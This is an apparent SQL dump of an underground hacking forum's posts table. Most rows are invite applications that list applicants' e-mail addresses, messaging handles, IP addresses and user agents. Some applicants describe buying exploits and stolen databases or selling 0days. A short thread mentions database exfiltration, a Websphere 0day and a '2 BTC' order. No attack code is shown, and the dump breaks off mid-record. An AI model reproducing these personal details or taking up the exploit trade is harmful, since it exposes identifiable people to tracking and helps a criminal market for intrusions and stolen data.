(1643, 1476, 0, 'Invite', 2, '{$name}', 1408270799, '[SIZE=\'4\'][COLOR=\'Sienna\']johnnyb[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: johnnyb@exploit.im\n[b]e-mail[/b]: johnnybw0rm22@mailinator.com\n[b]Info[/b]: i am buyer of exploits and DBs. Member of many forum like exploit.im.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 111.90.159.40\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://johnnyb.ie | johnnyb.ie \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1644, 1477, 0, 'Invite', 2, '{$name}', 1408270823, '[SIZE=\'4\'][COLOR=\'Sienna\']geciciuser[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: geciciuser@ccc.de\n[b]e-mail[/b]: geciciuser@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.122.19.54\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://geciciuser.ya.ru | geciciuser.ya.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1645, 1478, 0, 'Invite', 2, '{$name}', 1408272563, '[SIZE=\'4\'][COLOR=\'Sienna\']shark-php[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: sh4rkx@jabber.net\n[b]e-mail[/b]: shark-php@live.ca\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.158.180.41\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1646, 1479, 0, 'Invite', 2, '{$name}', 1408273831, '[SIZE=\'4\'][COLOR=\'Sienna\']g3sh3r[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: g3sh3r@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 91.205.155.144\n[*][b]real ip[/b]: 91.205.155.144\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://g3sh3r.yingwa.com.cn | g3sh3r.yingwa.com.cn \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1647, 1480, 0, 'Invite', 2, '{$name}', 1408274221, '[SIZE=\'4\'][COLOR=\'Sienna\']d3sp0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: d3sp0s@exploit.in\n[b]e-mail[/b]: d3sp0s@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; U; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2040.25 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.projectanarchy.com/cn/users/d3sp0s | http://www.projectanarchy.com/cn/users/d3sp0s \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1648, 1481, 0, 'Invite', 2, '{$name}', 1408276953, '[SIZE=\'4\'][COLOR=\'Sienna\']vjhgffh[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: DGFDG@FSFDSFSD.COM\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.65.58.169\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://okkarohd.blogspot.com/2011_11_01_archive.html | http://okkarohd.blogspot.com/2011_11_01_archive.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1651, 1482, 0, 'Invite', 2, '{$name}', 1408302422, '[SIZE=\'4\'][COLOR=\'Sienna\']shift[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: shiftreduce@gmail.com\n[b]e-mail[/b]: shiftreduce@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.66.57.168\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://shift.com.au | shift.com.au \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1652, 1483, 0, 'Invite', 2, '{$name}', 1408302782, '[SIZE=\'4\'][COLOR=\'Sienna\']softer[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: logosdelrjr@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 190.234.31.10\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/asofterworld | http://vk.com/asofterworld \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1653, 1484, 0, 'Invite', 2, '{$name}', 1408306989, '[SIZE=\'4\'][COLOR=\'Sienna\']Tarsius[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: tarsius@hushmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.116.85.109\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://tarsius.d3.ru | tarsius.d3.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1654, 1485, 0, 'Invite', 2, '{$name}', 1408308100, '[SIZE=\'4\'][COLOR=\'Sienna\']Me5145[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: notme1945@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 125.165.186.131\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/ken-b.../6173448523/ | https://www.flickr.com/photos/ken-b.../6173448523/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1656, 1486, 0, 'Invite', 2, '{$name}', 1408317993, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr_AnarShi-T[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w-98@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.28.27.9\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://thehackersmedia.blogspot.com/.../googleps-hacked-by-cold-z3ro-hackteach.html | http://thehackersmedia.blogspot.com/.../googleps-hacked-by-cold-z3ro-hackteach.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1657, 1487, 0, 'Invite', 2, '{$name}', 1408329427, '[SIZE=\'4\'][COLOR=\'Sienna\']Veki[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: silverspid3r@gmail.com\n[b]Info[/b]: Interested in security and cryptography, worked with few languages and programming since 7 years ago. Main goal is to study cryptography and learn more about it. Already have a project which earned me a gold medal for inovation with security + IT (it had to do something with webcams + infrared light, but I got a new idea which I will add to and expand that project).\r\nKnown languages: C#, C++, Java, Python and Basic\r\nMain goal: Learn more about security and become a web developer\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 88.207.45.214\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://veki.hu | veki.hu \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1659, 1425, 1574, 'lumbricus', 39, '', 1408351743, 'Where are all the web app dudes? Is this palce full of script kiddies?', 1, 0, '', 0, 1, 0, 0, 0),
(1660, 1488, 0, 'Invite', 2, '{$name}', 1408353118, '[SIZE=\'4\'][COLOR=\'Sienna\']marketisdisabled[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 12331123\n[b]e-mail[/b]: marketisdisabled@marketisdisabled.com\n[b]Info[/b]: marketisdisabled\r\nmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabled\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: 79.134.235.132\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1661, 1425, 1659, 'null', 9, '', 1408353158, '[QUOTE=lumbricus;1659]Where are all the web app dudes? Is this palce full of script kiddies?[/QUOTE]\r\n\r\n:D lol', 1, 0, '', 0, 1, 0, 0, 0),
(1662, 1425, 1574, 'lumbricus', 39, '', 1408353694, 'I appreciate your attention null, however I do not find my previous comment very funny...\n\nI wish I could share your comedy...\n\nIt is quite frustrating that I can\'t even find any like-minded testers :(\n\nEverybody I meet is just a scanner monkey who loves to play with havij or SQLmap', 1, 0, '', 0, 1, 0, 0, 0),
(1663, 1425, 1662, 'null', 9, '', 1408355020, '[QUOTE=lumbricus;1662]\r\nEverybody I meet is just a scanner monkey who loves to play with havij or SQLmap[/QUOTE]\r\n\r\nThis is just a test automation.', 1, 0, '', 0, 1, 0, 0, 0),
(1664, 1425, 1574, 'lumbricus', 39, '', 1408355318, 'Yes, I understand what it is. I am also highly experienced. I only require help with extremely difficult problems.', 1, 0, '', 0, 1, 0, 0, 0),
(1665, 1489, 0, 'Invite', 2, '{$name}', 1408355346, '[SIZE=\'4\'][COLOR=\'Sienna\']xotopix[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: xotopix@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.157.20.236\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/fotopix | https://twitter.com/hashtag/fotopix \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1666, 1425, 1664, 'null', 9, '', 1408355468, '[QUOTE=lumbricus;1664]Yes, I understand what it is. I am also highly experienced. I only require help with extremely difficult problems.[/QUOTE]\r\n\r\nOne head good- a forum better!\r\n\r\nÃÂðôõюÑÂÑŒ ÿрðòøûьýþ ýðÿøÑÂðû ÑÂту хрõýь-\r\nÞôýð óþûþòð хþрþшþ- цõûыù фþруü ûучшõ!', 1, 0, '', 0, 1, 0, 0, 0),
(1667, 1425, 1664, 'ropertus', 33, '', 1408355572, '[QUOTE=lumbricus;1664]Yes, I understand what it is. I am also highly experienced. I only require help with extremely difficult problems.[/QUOTE]\r\n\r\nWhat would you deem an extremely difficult problem? Can you give us an example so we get an idea of the scale of the problems at hand?', 1, 1, '', 0, 1, 0, 0, 0),
(1668, 1425, 1574, 'lumbricus', 39, '', 1408355944, 'Sure, \r\n\r\nThere are too many examples to list all, so I will keep the list controlled. \r\n\r\nUnorthodox database ex-filtration techniques, mainly due to custom code (Scanners will not work) \r\n\r\nI do not hate scanners, however they are noisy and most of the time do not work on custom deployments. \r\n\r\nAlso, many research issues, IBM Websphere Commerce 0day but facing issues with merchant key etc \r\n\r\nPlease forgive my unwillingness to share my details in this public forum, I really enjoy this forum but work should be spoken of during OTR communications.', 1, 0, '', 0, 1, 0, 0, 0),
(1670, 1490, 0, 'lumbricus', 39, 'Order - 2 BTC', 1408360114, 'Contact for order - OTR/PGP', 1, 0, '', 0, 1, 0, 0, 0),
(1688, 1506, 0, 'Invite', 2, '{$name}', 1408452980, '[SIZE=\'4\'][COLOR=\'Sienna\']cr33k[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: cr33k@jabb3r.de\n[b]e-mail[/b]: munsters2kx@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.53.172.56\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.threadless.com/profile/1524260/cr33k | https://www.threadless.com/profile/1524260/cr33k \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1671, 1491, 0, 'Invite', 2, '{$name}', 1408366164, '[SIZE=\'4\'][COLOR=\'Sienna\']Flu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: flu8127s@jabber.ru\n[b]e-mail[/b]: none, contact me on jabber.\n[b]Info[/b]: I\'m Flu,\r\n\r\nI\'m a coder/hacker etc for ~10 years. I have discovered 0days in many major PHP apps such as KAYAKO, PLESK and many bugs in major websites.More recently however I have moved on to finding memory exploits in software such as media players (VLC, Quicktime) and web browsers.\r\n\r\nI was previously a member of the underground forum Darkode (under a different name) where I offered hacking services/0days. I will be looking to help with the research of new 0days and possibly become a buyer of some too.\r\n\r\n\r\nThanks,\r\nFlu.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.95.224.187\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: 